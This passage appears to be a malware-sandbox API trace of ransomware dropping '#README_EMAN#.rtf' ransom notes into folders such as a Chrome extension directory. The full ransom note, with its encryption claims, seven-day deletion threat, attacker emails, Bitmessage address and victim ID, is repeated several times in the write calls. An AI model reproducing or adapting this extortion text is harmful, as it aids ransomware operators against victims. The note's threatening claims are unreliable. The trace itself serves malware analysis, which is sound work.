nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.053] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.053] CloseHandle (hObject=0x294) returned 1 [0285.053] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\#readme_eman#.rtf")) returned 0xffffffff [0285.054] GetLastError () returned 0x2 [0285.054] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 